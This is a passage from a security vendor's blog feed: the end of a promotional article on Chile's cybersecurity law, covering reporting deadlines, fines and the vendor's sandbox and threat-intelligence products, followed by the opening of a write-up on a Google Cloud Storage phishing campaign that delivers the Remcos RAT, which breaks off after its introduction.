<p>The&nbsp;<strong>reporting timelines</strong>&nbsp;are especially important for CISOs, SOC leaders, and&nbsp;<a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktomssplanding" target="_blank" rel="noreferrer noopener">MSSPs</a>&nbsp;serving regulated clients. The law requires an early warning within three hours after learning of a significant incident, an updated report within 72 hours, and a final report within 15 days. </p>



<p>If the affected entity is an OIV and the incident disrupts its essential service, the second report deadline tightens to 24 hours. OIVs must also communicate a formal action plan within seven days.&nbsp;</p>



<p>The key shift is simple: the law focuses less on documented intent and more on proven capability. It is not enough to say controls are in place. Organizations need to show they can investigate suspicious activity, confirm whether a threat is real, and support response decisions with evidence.&nbsp;</p>



<p>That changes the standard for security teams. Alerts alone are not enough. Teams need visibility, faster analysis, and a reliable investigation trail they can stand behind during reporting, audits, and post-incident review.&nbsp;</p>



<h2 class="wp-block-heading">What Non-Compliance Can Cost&nbsp;</h2>



<p>The legal exposure is serious.&nbsp;Minor infringements can be fined up to&nbsp;<strong>5,000 UTM</strong>, serious infringements up to&nbsp;<strong>10,000 UTM</strong>, and&nbsp;very serious&nbsp;infringements up to&nbsp;<strong>20,000 UTM</strong>. For operators of vital importance, those maximums double to&nbsp;<strong>10,000</strong>,&nbsp;<strong>20,000</strong>, and&nbsp;<strong>40,000&nbsp;UTM</strong>&nbsp;respectively.&nbsp;&nbsp;</p>



<p>For leadership, the business risk goes beyond the fine itself. When teams cannot investigate suspicious activity quickly, explain what happened, or produce defensible incident evidence, the result can be longer disruption, slower communication with authorities, and more exposure during audits. That is why this law should not be treated as only a legal issue. It is also a detection, response, and operational-readiness issue.&nbsp;</p>



<h2 class="wp-block-heading">The Compliance Challenge: Why This Is Hard&nbsp;</h2>



<p>For SOCs and incident response teams across Chile, the new requirements create significant operational pressure:&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image-8-1024x576.png" alt="" class="wp-image-20047" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image-8-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image-8-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image-8-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image-8-1536x864.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image-8-2048x1152.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image-8-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image-8-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image-8-740x416.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Challenges for security teams in Chile</em></figcaption></figure></div>


<p>&nbsp;</p>



<h3 class="wp-block-heading">1.&nbsp;Alert Overload, Limited Analysis Capacity&nbsp;</h3>



<p>Chilean organizations are facing the same challenge plaguing SOCs globally: too many alerts, not enough time to investigate them properly. SOC teams are drowning in noise from SIEM and EDR platforms, struggling to separate real threats from false positives.&nbsp;</p>



<h3 class="wp-block-heading">2.&nbsp;Talent Shortage&nbsp;</h3>



<p>The cybersecurity skills gap is acute in Latin America. According to industry data, LATAM experiences approximately&nbsp;<strong>2,716 cyberattacks per organization per week,</strong><strong>&nbsp;</strong>significantly above the global average. Yet there&nbsp;aren&#8217;t&nbsp;enough trained analysts to keep pace with investigation demands.&nbsp;</p>



<h3 class="wp-block-heading">3.&nbsp;Malware Analysis Bottlenecks&nbsp;</h3>



<p>Many sandbox solutions provide a verdict, but limited visibility into how the threat behaves or why it matters. When regulators ask for detailed incident reports, security teams need more than a malicious or benign label. They need evidence, context, and a clearer view of the attack chain.&nbsp;</p>



<h3 class="wp-block-heading">4.&nbsp;Rising Threat Sophistication&nbsp;</h3>



<p>Attackers targeting Latin America, particularly Chile&#8217;s banking and financial sectors, are deploying region-specific malware families like <strong>Mekotio, </strong><a href="https://any.run/malware-trends/grandoreiro/" target="_blank" rel="noreferrer noopener"><strong>Grandoreiro</strong></a><strong>,</strong> and <strong>Casbaneiro</strong>. These threats use novel evasion techniques specifically designed to bypass legacy detection systems.</p>



<h2 class="wp-block-heading">Close the Security Gap with Better Threat Visibility, Analysis, and Response&nbsp;</h2>



<p>Under Chile’s new framework, security gaps are no longer just technical weaknesses. They can become compliance failures, reporting delays, and broader business risks.&nbsp;<a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;helps organizations close those gaps with stronger threat visibility, faster analysis, and more defensible response workflows.&nbsp;</p>



<h3 class="wp-block-heading">1. Threat Intelligence for Better Visibility and Prioritization&nbsp;</h3>



<p>One of the hardest parts of compliance is knowing which threats deserve immediate attention. Security teams already deal with large volumes of alerts, but the new law raises the need for monitoring that is not only active, but relevant to actual business risk.&nbsp;</p>



<p>ANY.RUN’s&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence&nbsp;Lookup</a>&nbsp;helps teams focus on threats that matter most to their environment. Rather than treating threat intelligence as just another dataset, it works as an operational layer that connects threat context with prioritization and action across the SOC lifecycle. Instead of relying only on generic indicators, organizations can investigate threats through industry- and geo-specific context.&nbsp;</p>



<p>For example, a query such as&nbsp;<a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktotilookup#{%22query%22:%22submissionCountry:%5C%22CL%5C%22%20AND%20industry:%5C%22banking%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener"><strong>submissionCountry:&#8221;CL&#8221; AND&nbsp;industry:&#8221;banking&#8221;</strong></a>&nbsp;can help teams understand what is actively targeting Chile’s financial sector. This gives analysts faster context for triage, supports continuous risk management, and helps organizations build monitoring around real threats rather than assumptions.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="557" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-1024x557.png" alt="" class="wp-image-20038" style="width:650px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-1024x557.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-300x163.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-768x418.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-1536x836.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-2048x1114.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-370x201.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-270x147.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image2-740x403.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Threat activity targeting Chile’s financial sector, visible inside TI Lookup</em>&nbsp;</figcaption></figure></div>


<p>With this approach, organizations can:&nbsp;</p>



<ul class="wp-block-list">
<li>Focus security efforts on the threats most relevant to their sector&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Improve prioritization across monitoring and triage workflows&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Reduce investigation delays caused by low-context alerts&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Strengthen continuous risk management with more relevant threat visibility&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Build a stronger foundation for defensible response and reporting&nbsp;</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight"> Strengthen cyber readiness where business risk is highest </span><br>Improve prioritization and decisions with clearer threat context&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=chile-cybersecurity-framework-law&#038;utm_term=150426&#038;utm_content=linktotilookuplanding#contact-sales" rel="noopener" target="_blank">
Upgrade your SOC
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">2.&nbsp;Behavioral&nbsp;Analysis for Faster Investigation and Clearer Evidence&nbsp;</h3>



<p>Threat visibility is only the first step. Once a suspicious file, URL, or email is detected, teams still need to understand what it&nbsp;actually does, how serious it is, and what actions should follow.&nbsp;</p>



<p>ANY.RUN’s&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;helps security teams investigate threats through real&nbsp;behavioral&nbsp;analysis. Instead of receiving only a verdict, analysts can&nbsp;observe&nbsp;malicious activity as it unfolds, understand the attack chain, extract indicators, and see the broader context of the incident. This makes it easier to&nbsp;validate&nbsp;threats faster, support containment decisions, and produce clearer evidence for reporting, audits, and post-incident review.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="570" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-1024x570.png" alt="" class="wp-image-20041" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-1024x570.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-768x427.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-1536x855.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-2048x1140.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-370x206.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-740x412.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Threat analysis carried out inside ANY.RUN sandbox</em>&nbsp;<br></figcaption></figure></div>


<p>In practice, this allows organizations to:&nbsp;</p>



<ul class="wp-block-list">
<li>Understand how a threat behaves, not just whether it is malicious&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Confirm impact faster and make response decisions with more confidence&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://any.run/cybersecurity-blog/enrich-iocs-with-threat-intelligence/" target="_blank" rel="noreferrer noopener">Extract IOCs</a>&nbsp;and other evidence for reporting and follow-up investigation&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Support containment with clearer visibility into attacker activity&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Build a more defensible investigation trail for audits and incident review&nbsp;</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Turn uncertain alerts into faster, defensible decisions</span><br>Give teams clearer evidence for response and reporting&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=chile-cybersecurity-framework-law&#038;utm_term=150426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Integrate your SOC
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">3. Integrations and Threat Feeds for Faster Detection and Response&nbsp;</h3>



<p>Meeting regulatory expectations also depends on how quickly security teams can move from detection to action. When threat data stays locked in separate tools or requires manual handling, triage slows down, response becomes less consistent, and reporting gets harder under tight deadlines.&nbsp;</p>



<p>ANY.RUN helps reduce that friction by connecting threat intelligence and sandbox analysis directly to existing security workflows through ready-made connectors, STIX/TAXII, and API/SDK options. This allows teams to move investigation data into SIEM, SOAR, EDR, and TIP environments faster, so enrichment, correlation, and response can happen with less manual effort.&nbsp;&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-1-1024x578.png" alt="" class="wp-image-20044" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-1-1024x578.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-1-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-1-768x433.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-1-1536x866.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-1-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-1-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-1-740x417.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-1.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Integration opportunities for ANY.RUN Threat Intelligence</em>&nbsp;<br></figcaption></figure></div>


<p><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>&nbsp;continuously deliver high-confidence malicious indicators sourced from live attack investigations across&nbsp;<strong>15,000 organizations</strong>&nbsp;and&nbsp;<strong>600,000 analysts</strong>, helping teams work with fresh threat data instead of static lists.&nbsp;&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Strengthen detection with live threat data from real attacks</span><br>Help your team correlate faster and respond with less effort&nbsp;   
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=chile-cybersecurity-framework-law&#038;utm_term=150426&#038;utm_content=linktotifeedslanding#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>This gives organizations the ability to:&nbsp;</p>



<ul class="wp-block-list">
<li>Push fresh threat data directly into existing detection and response tools&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Reduce manual workload in enrichment and triage workflows&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Improve alert quality with validated, high-confidence indicators&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Speed up correlation and response across the SOC stack&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Build a more scalable and operationally consistent security model&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Support Compliance Readiness with Privacy, Control, and Audit Confidence&nbsp;</h2>



<p>Security teams also need confidence that sensitive analyses can be handled in a controlled environment that supports internal governance, confidentiality, and audit readiness. That is especially important for organizations working under stricter reporting obligations and higher regulatory scrutiny.&nbsp;</p>



<p>ANY.RUN supports that need with&nbsp;<a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener"><strong>SOC 2 Type II</strong></a><strong>&nbsp;attested security</strong>&nbsp;and&nbsp;<a href="https://any.run/cybersecurity-blog/privacy-features/" target="_blank" rel="noreferrer noopener"><strong>private, access-controlled</strong></a><strong>&nbsp;sandbox analysis d</strong>esigned for confidential investigations.&nbsp;&nbsp;</p>



<p>ANY.RUN’s private sandbox sessions&nbsp;remain&nbsp;confidential through strict access controls and encrypted data processing, helping organizations investigate threats without exposing case data to the public community. For leadership, this matters because improving detection and response is not enough on its own. The investigation environment also needs to meet enterprise expectations for security, privacy, and operational reliability.&nbsp;&nbsp;</p>



<p>This becomes especially valuable when incidents involve sensitive internal files, regulated environments, or investigations that may later be reviewed by auditors, executives, or external authorities. With stronger privacy controls around analysis data, organizations can reduce the risk of accidental exposure while giving security teams a safer way to investigate suspicious activity and preserve a defensible trail of evidence.&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.&nbsp;&nbsp;&nbsp;</p>



<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real&nbsp;behavior&nbsp;in an&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, enrich&nbsp;indicators&nbsp;with immediate context through&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and&nbsp;monitor&nbsp;emerging malicious infrastructure using&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=chile-cybersecurity-framework-law&amp;utm_term=150426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the&nbsp;SOC.&nbsp;<strong>&nbsp;</strong>&nbsp;</p>



<h2 class="wp-block-heading">Frequently Asked Questions&nbsp;</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1776250587307"><strong class="schema-faq-question"><strong>What changes for security leaders under Chile’s Cybersecurity Framework Law?</strong></strong> <p class="schema-faq-answer">The law raises the standard from having policies on paper to proving operational readiness in practice. It sets minimum requirements for preventing, containing, resolving, and responding to cyber incidents, creates ANCI as the national authority, and gives regulators a clearer basis for oversight and sanctions. In practice, that means leadership teams need confidence that detection, investigation, reporting, and continuity measures will hold up under pressure.  </p> </div> <div class="schema-faq-section" id="faq-question-1776250607767"><strong class="schema-faq-question"><strong>Which organizations are most exposed to these requirements?</strong></strong> <p class="schema-faq-answer">The law applies to providers of essential services and to entities designated as Operators of Vital Importance, or OIVs. The covered sectors include areas such as energy, water, telecom, digital infrastructure, transport, banking and payments, postal services, and healthcare, while ANCI has the power to formally qualify OIVs.  </p> </div> <div class="schema-faq-section" id="faq-question-1776250615647"><strong class="schema-faq-question"><strong>What will regulators expect an organization to be able to show?</strong></strong> <p class="schema-faq-answer">At a minimum, regulated entities must permanently apply measures to prevent, report, and resolve incidents. For OIVs, the bar is higher: they must run a continuous information security management system, maintain records of security actions, implement and review continuity and cybersecurity plans, carry out ongoing reviews and exercises, train staff, and appoint a cybersecurity delegate who reports upward.  </p> </div> <div class="schema-faq-section" id="faq-question-1776250623049"><strong class="schema-faq-question"><strong>Why does response speed matter so much under this law?</strong></strong> <p class="schema-faq-answer">Because the reporting clock starts quickly. The law requires an early alert within 3 hours of learning about a significant incident, an update within 72 hours, and a final report within 15 days. If an OIV’s essential service is affected, the update deadline tightens to 24 hours, and OIVs must also adopt an action plan within 7 days. For leadership, this makes delayed investigation a business risk, not just a technical issue. </p> </div> <div class="schema-faq-section" id="faq-question-1776250631492"><strong class="schema-faq-question"><strong>Does the law require specific tools?</strong></strong> <p class="schema-faq-answer">No. It does not prescribe named products. What it does require is that organizations can prevent, report, and resolve incidents, follow ANCI protocols and standards, and support continuity and incident handling with real operational capability. That is why the focus for leadership should be less on tool count and more on whether teams can investigate, decide, and report fast enough when it matters.  </p> </div> <div class="schema-faq-section" id="faq-question-1776250641849"><strong class="schema-faq-question"><strong>Why does investigation quality matter for compliance?</strong></strong> <p class="schema-faq-answer">Because the law is built around response, reporting, and oversight. ANCI can require information needed to understand incidents, supervise compliance, and enforce sanctions, while the law also emphasizes continuity, risk management, and documented actions. For leadership teams, that makes clear evidence and a defensible investigation trail part of compliance readiness. </p> </div> </div>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/chile-cybersecurity-framework-law/">Chile’s Cybersecurity Framework Law: How SOCs Achieve Compliance and Response Readiness</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/chile-cybersecurity-framework-law/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>When Trust Becomes a Weapon: Google Cloud Storage Phishing Deploying Remcos RAT</title>
		<link>https://any.run/cybersecurity-blog/phishing-google-drive-remcos/</link>
					<comments>https://any.run/cybersecurity-blog/phishing-google-drive-remcos/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Tue, 14 Apr 2026 11:04:16 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware behavior]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[RAT]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=19993</guid>

					<description><![CDATA[<p>Modern phishing campaigns increasingly abuse legitimate services. Cloud platforms, file-sharing tools, trusted domains, and widely used SaaS applications are now part of the attacker’s toolkit. Instead of breaking trust, attackers borrow it.&#160; This shift creates&#160;a dangerous&#160;asymmetry. Security controls often whitelist or inherently trust these services, while users are far less likely to question them. The [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/phishing-google-drive-remcos/">When Trust Becomes a Weapon: Google Cloud Storage Phishing Deploying Remcos RAT</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Modern phishing campaigns increasingly abuse legitimate services. Cloud platforms, file-sharing tools, trusted domains, and widely used SaaS applications are now part of the attacker’s toolkit. Instead of breaking trust, attackers borrow it.&nbsp;</p>



<p>This shift creates&nbsp;a dangerous&nbsp;asymmetry. Security controls often whitelist or inherently trust these services, while users are far less likely to question them. The result is a smoother path from inbox to infection.&nbsp;</p>



<h2 class="wp-block-heading">Key Takeaways&nbsp;</h2>



<ul class="wp-block-list">
<li>Attackers are shifting to trusted cloud infrastructure (Google Storage) to bypass email filters and reputation checks.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The multi-stage chain uses obfuscated JS/VBS/PowerShell and legitimate RegSvcs.exe for process injection, making static detection ineffective.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Remcos&nbsp;RAT provides full remote control, keylogging, and data exfiltration — turning one compromised endpoint into a persistent foothold.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Credential harvesting combined with malware delivery creates dual risk: immediate data theft plus long-term network compromise.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Traditional EDR relying on file reputation misses these attacks; behavioral sandboxing and real-time TI are&nbsp;required.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>ANY.RUN’s&nbsp;<a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">Interactive Sandbox, TI Lookup, and TI Feeds</a>&nbsp;enable&nbsp;proactive detection and rapid response, closing the gap before damage occurs.&nbsp;<br>&nbsp;</li>
</ul>



<h2 class="wp-block-heading">The New Face of Phishing: When “Legitimate” Becomes Lethal&nbsp;</h2>



<p>According to ANY.RUN&#8217;s annual&nbsp;<a href="https://any.run/cybersecurity-blog/malware-trends-2025/" target="_blank" rel="noreferrer noopener">Malware Trends Report</a>&nbsp;for 2025,&nbsp;phishing driven by multi-stage redirect chains and trusted-cloud hosting has become the dominant attack vector, with&nbsp;<a href="https://any.run/malware-trends/rat/" target="_blank" rel="noreferrer noopener">RATs</a>&nbsp;and backdoors rising 28% and&nbsp;68%&nbsp;respectively. The abuse of legitimate platforms has made traditional reputation-based filtering fundamentally unreliable.&nbsp;</p>



<p>Early detection is no longer simply a technical performance metric. It is a business continuity imperative. When threats hide inside trusted infrastructure, the window between&nbsp;initial&nbsp;infection and serious organizational impact can be measured in hours, not days. Security teams that cannot&nbsp;identify&nbsp;and&nbsp;contain&nbsp;an attack in its earliest stages — before the payload executes, before the C2 channel&nbsp;is&nbsp;established, before the attacker pivots deeper into the network — face an exponentially harder response challenge.&nbsp;</p>



<h2 class="wp-block-heading">Phishing Campaign Hiding&nbsp;Remcos&nbsp;RAT Inside Google Cloud Storage&nbsp;</h2>



<p>In April 2026, ANY.RUN’s threat research team&nbsp;identified&nbsp;a sophisticated multi-stage phishing campaign that perfectly exemplifies this new breed of attack. The campaign abuses Google Cloud Storage to host HTML phishing pages themed as Google Drive document viewers,&nbsp;ultimately delivering&nbsp;the&nbsp;Remcos&nbsp;Remote Access Trojan (RAT).&nbsp;</p>



<p><a href="https://app.any.run/tasks/0efd1390-c17a-49ce-baef-44b5bd9c4a97/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-google-drive-remcos&amp;utm_term=140426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View the attack in&nbsp;real&nbsp;time in a live sandbox session</a>&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="486" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_2-1024x486.png" alt="" class="wp-image-20004" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_2-1024x486.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_2-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_2-768x365.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_2-1536x729.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_2-370x176.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_2-270x128.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_2-740x351.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/googleremcos_2.png 1841w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Sandbox analysis of&nbsp;a&nbsp;phishing attack</em>&nbsp;</figcaption></figure>



